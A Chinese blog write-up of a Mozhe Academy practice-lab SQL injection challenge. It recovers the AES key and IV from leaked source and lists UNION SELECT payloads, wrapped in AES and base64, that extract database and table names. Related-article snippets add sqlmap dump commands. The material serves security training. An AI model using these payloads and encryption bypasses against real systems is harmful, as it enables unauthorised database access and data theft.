墨者学院 - SQL注入漏洞测试(参数加密)

最新推荐文章于 2025-06-12 19:36:54 发布
原创 最新推荐文章于 2025-06-12 19:36:54 发布 · 2.6k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何测试SQL注入漏洞,通过分析源码解密过程,利用AES加密和Base64解码构造payload。通过一系列查询确定数据库名、表名、字段名,并获取敏感信息。最后提供了在线工具链接辅助解密。

list.php

御剑扫描得到   http://219.153.49.228:48291/news/list.zip

解压得到源码


从decode方法可知:AES的数据块长度为128位,密钥为ydhaqPQnexoaDuW3,偏移量为2018201920202021,填充为zeropadding

第八行 :判断网页id后面的查询字符串值,先两次base64解密,再AES解密,删除_mozhe字符,得到需要的id

第十一行;判断字符串是否有 “_mozhe”


反之逆序构造payload,先将注入字符串末尾添加_mozhe字符,然后AES加密

因为AES加密默认已进行了一次base64加密,所以aes加密后再进行一次base64加密即可
(((密文)base64解密)base64解密)AES解密+'_mozhe'=id
((id+“_mozhe”)AES加密)base64加密 = 密文


注入
找显示位置
1 and 1=2 union select 1,2,3,4_mozhe
得出2为标题,3为内容

找数据库名
1 and 1=2 union select 1,database(),version(),4_mozhe
得出数据库mozhe_Discuz_StormGroup

找表名
1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1_mozhe
得出第一个表:StormGroup_member
后面还会找到notice表,

最低0.47元/天 解锁文章

新学期VIP享超值加赠
SQL注入漏洞实验
weixin_44940180的博客
05-09 867
实验来源于:Pikachu漏洞平台教学视频 ** 猜测后台sql语句怎么进行拼接,构造闭合 ** 一、数字型注入 随便选择后显示的信息 打开BP,抓包 设置id=100 or 1=1(真),GO 右侧看到显示全部的信息 二、字符型注入 字符型注入: 数据是否被单引号、双引号、括号等等包括起来 输入 ’ 会报错: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ver
(9)SQL注入漏洞(实验)
weixin_45995579的博客
09-16 228
2021-9-16 --续 六、脱库(ctrl+c退出) 脱数据库 --dump-all sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all (脱所有数据库,动静太大,不能随便脱) sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump (一般用这个) 七、调线程 --thread 调线程 范围1-10 sqlmap -u "htt...
测试工程师的“安全宝典”:SQL注入漏洞全攻略
最新发布
YJT1002的博客
06-12 698
SQL 注入是指攻击者通过在输入数据中嵌入恶意的 SQL 语句,从而改变应用程序与数据库交互时执行的 SQL 逻辑,达到获取敏感信息、篡改数据或执行非法操作的目的。这种漏洞通常出现在与数据库交互的应用程序中,如网站的登录页面、搜索功能、表单提交等。
墨者学院SQL注入漏洞测试(delete注入)
weixin_43884770的博客
12-04 1952
**背景介绍** 最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份。 **实训目标** 1、熟练掌握留言板的工作原理; 2、善用burp抓取数据包; **解题方向** 抓取数据包加以分析。
渗透学习—靶场篇—墨者学院SQL注入漏洞测试(参数加密)
qq_43696276的博客
10-25 2105
这一关,难点主要在于需要我们判断参数后的加解密类型,从而引导我们去目录遍历,拿到对应的源码!!!然后呢,还需要我们能够对php代码进行审计,从而找出其参数加密过程。。其中还有一个坑在于末尾要加上_mozhe总体而言,感觉难度还是稍有的(于我个人而言)
SQL注入漏洞测试(参数加密)
网络空间安全学习
07-30 279
先将此字符串进行base64解密,然后再进行AES解密,将base64解密后的结果放到AES界面工具的密文当中,结合秘钥和偏移量以及填充,可得原值。同理,将构造的sql语句还是先AES加密,再base64加密,将最后的加密结果放到url当中去访问即可!都是同样的道理,先AES加密,再base64加密,将最后的加密结果放到url当中去访问执行即可。首先将sql语句写好然后进行AES加密,再进行base64加密,然后在放入到url当中即可。得到该AES加密的偏移量和秘钥后,可进行解密。
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5329
墨者学院-SQL注入漏洞测试(报错盲注)
墨者学院SQL手工注入漏洞测试(MySQL数据库)
muyuchen110的博客
07-22 541
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
记一篇墨者学院SQL手工注入漏洞测试(MySQL数据库)write up
2403_87248548的博客
05-16 1182
最后再把整体的一个思维导图放下面给大家看一下吧!我把整个流程一次从左到右依次列了出来希望对大家有所帮助!
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
qq_48368964的博客
07-22 801
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
sql注入攻击实验
05-25
sql注入攻击,先自己搭建一个网站,链接数据库必须用Sa链接
Java敏捷开发(王伟杰译)
07-19
用于Java的开发,很实用的,希望可以帮助你们,给好评
墨者学院CTF(SQL注入漏洞测试(参数加密)
痴人说梦梦中人
08-10 5850
靶场地址:https://www.mozhe.cn/bug/detail/SjRRVFpOQWlLWDBJd3hzNGY5cFBiQT09bW96aGUmozhe 1. 靶场截图: 2. 目录扫描 访问可得new目录下list.php源码,即在此处存在注入漏洞 3. 代码审计 <?php header('content-type:text/html;charset=utf-8'); //发起...
SQL注入漏洞测试(参数加密)&墨者靶场
qq_63283137的博客
10-06 325
爆表:-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1_mozhe。加密原理:明文-->AES加密--> bsse64加密--->base64加密-->密文。查回显:-1 union select 1,2,3,4_mozhe。尝试解密,无法解密,可能是有多种加密方式组合或加salt。
记一次SQL注入
weixin_50607688的博客
07-04 436
由于传参是需要进行base64编码的,所以在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本,只需要在常规的语句中机上—tamper base64encode.py即可。我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于inurl:.php?id=1,可以额外的尝试搜搜1的base64编码值MQ==,即可以搜索。id=MQ==搜索到了一处存在sql注入的网站。(7)获取其中admin表的字段值。(8)获取对应的值。
sql注入漏洞和实验
2303_81447649的博客
02-29 1648
发现不管输入什么都不管用了这个时候布尔盲注就不适合我们了,布尔盲注对于页面的正确和错误有不同的回显,如果页面一直没有变化我们就可以用时间盲注其实时间盲注和布尔盲注没有多大的差别,时间盲注多了if和sleep()函数。在将数据存入到了数据库中之后,开发者就认为数据是可信的,在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,就会造成二次注入SQL注入攻击的本质,服务器没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。
【实训04】数据库SQL注入漏洞
一只鼠标的博客
10-17 1908
LAMP:LAMP是指一组通常一起使用来运行动态网站或者服务器的自由软件名称首字母缩写。L:Linux,操作系统A:Apache网页服务器M:MySQL,数据库管理软件P:PHP,脚本语言DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。password,将其写入。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值